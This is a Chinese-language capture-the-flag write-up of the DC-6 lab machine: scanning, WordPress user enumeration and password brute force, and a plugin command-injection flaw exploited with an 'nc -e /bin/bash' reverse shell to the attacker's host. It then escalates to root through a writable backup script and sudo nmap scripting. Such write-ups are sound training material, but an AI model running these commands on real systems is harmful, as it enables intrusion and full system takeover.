【渗透项目】靶机DC-6渗透过程

信息收集

主机发现

nmap -sn 192.168.189.0/24

端口扫描

nmap -sT -v -A 192.168.72.158 --script=vuln

发现开放了80端口，尝试用浏览器对该站点进行访问

该网站应该做了访问限制，只能通过域名的方式访问，但因为本地hosts中缺少对应的IP，导致域名解析失败而无法进行访问，解决办法是在hosts文件中写入对应域名和IP

windows hosts默认路径：
C:\Windows\System32\drivers\etc
linux hosts默认路径：
/etc/hosts
添加信息：
192.168.72.158	wordy

保存hosts后再次访问就正常了（又是wordpress，DC-2的既视感）

网站指纹扫描

使用Wappalyzer进行

因为CMS可能存在一些漏洞，因此可以根据CMS版本进行漏洞检查

wpscan --url wordy -e
-e 枚举

wpscan --url wordy -e u

| Username found: admin
| Username found: graham
| Username found: mark
| Username found: sarah
| Username found: jens

得到WP处在的用户名后，可以对用户进行暴力破解

靶机信息页面
根据靶机信息页面的提示，使用kali自带的字典rockyou.txt进行暴破

wpcan --url wordy -U user.txt -P pass.txt

user:mark
pass:helpdesk01

目录扫描

使用dirbuster对目标站点进行目录扫描

漏洞利用

使用找到的账号、密码登陆wp-login

命令执行

在对Activity monitor测试，发现存在命令执行漏洞


利用此处的命令执行，就可以获得webshell

先在kali上开启监听

执行连接远程端口的命令

nc -e /bin/bash 192.168.72.146 7777

即可获得websshell

提权操作

先查看靶机上的环境，根据靶机环境来进行提权

whereis wget git php python nmap

发现靶机上安装了nmap，nmap因为在执行扫描的过程中需要调用root权限，管理员为了更顺利得使用nmap，会给nmap赋予更高得权限，可以通过执行nmap来将root权限反弹出来。

一般这种利用的提权方式是SUDO误配或SID提权

检查靶机上的SID置位的文件，发现并没有nmap或其他可执行系统命令的文件

find / -perm -u=s -type f 2>/dev/null

尝试使用SUDO执行命令，发现需要输入密码

这时候需要切换用户，先进入/home查看

可以看到backups.sh的所属用户和所属组用户都拥有可读可写可执行的权限，其他用户只能查看内容

查看内容发现是执行备份命令的文件

在/home/mark/stuff目录下找到了graham的密码

在已知账号和密码的情况下，可以先尝试直接使用已知账号的密码提权
但在该靶机上都被拒绝了

查看sudo列表，发现可以免密执行jens的备份文件；而且graham的用户组与jens都是devs
根据之前找到的信息，devs组的用户对backups.sh应该有777的权限

直接对该文件写入调用bash的命令

echo ‘/bin/bash’ >> backups.sh

以jens用户身份运行该文件即可获得目标shell

sudo -u jens ./backups.sh

查看sudo列表，可以用root身份免密执行nmap
可以让jens用户利用root身份执行nmap来提权

先写一个getShell的脚本

echo ‘os.execute("/bin/sh")’ >getShell

用root身份执行nmap，并附带执行getShell脚本

sudo -u root nmap --script=getShell

合影